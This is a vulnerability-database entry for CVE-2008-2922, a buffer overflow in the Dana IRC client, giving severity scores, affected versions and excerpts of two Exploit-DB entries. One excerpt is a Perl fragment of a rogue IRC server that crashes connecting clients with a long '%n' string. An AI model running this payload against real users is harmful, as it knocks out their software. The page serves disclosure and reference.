CVE-2008-2922
published 2008-06-30CVE-2008-2922: Stack-based buffer overflow in artegic Dana IRC client 1.3 and earlier allows remote attackers to cause a denial of service (application crash) or possibly…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
5.05%
91.2th percentile
Stack-based buffer overflow in artegic Dana IRC client 1.3 and earlier allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long IRC message.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| t0pp8uzz | dana_irc_client | <= 1.3 | — |
| t0pp8uzz | dana_irc_client | — | — |
| t0pp8uzz | dana_irc_client | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Dana IRC 1.4a - Remote Buffer Overflow
exploitdb·2008-08-25
CVE-2008-2922 Dana IRC 1.4a - Remote Buffer Overflow
Dana IRC 1.4a - Remote Buffer Overflow
---
#!/usr/bin/perl
# k`sOSe - 08/24/2008
# This is a useless and not portable exploit code, tested only on my winxp-sp3 VM.
# I was looking for a vuln to write an exploit for when I found this PoC:
#
# http://www.milw0rm.com/exploits/5817
#
# The author wrote:
# "The reason why there isnt any shellcode here is because the client is
# coverting the junk/buffer data to unicode so its corrupting the shellcode,
# ive tried sending unicode buffer but the same problem occurs.
# if anyone else can get further please let me know. but i doubt you can"
#
# It is for this reason, a small suggestion of impossibility(copyright Phantasmal Phantasmagoria)
# that i decided to write this. Actually it was pretty funny :)
#
# The first problem is how to redirect the
Exploit-DB
Dana IRC 1.3 - Remote Buffer Overflow (PoC)
exploitdb·2008-06-14
CVE-2008-2922 Dana IRC 1.3 - Remote Buffer Overflow (PoC)
Dana IRC 1.3 - Remote Buffer Overflow (PoC)
---
- Dana IRC new( Proto => 'tcp', LocalPort => '6667', Listen => SOMAXCONN, Reuse => 1 );
$jnk = "%n"x1000;
print "Running..";
while($client = $sock->accept()) {
print $client "$jnk\r\n";
print "Crashed Client!\n";
}
# milw0rm.com [2008-06-14]
http://secunia.com/advisories/30681http://www.securityfocus.com/bid/29724https://exchange.xforce.ibmcloud.com/vulnerabilities/43112https://www.exploit-db.com/exploits/5817http://secunia.com/advisories/30681http://www.securityfocus.com/bid/29724https://exchange.xforce.ibmcloud.com/vulnerabilities/43112https://www.exploit-db.com/exploits/5817
2008-06-30
Published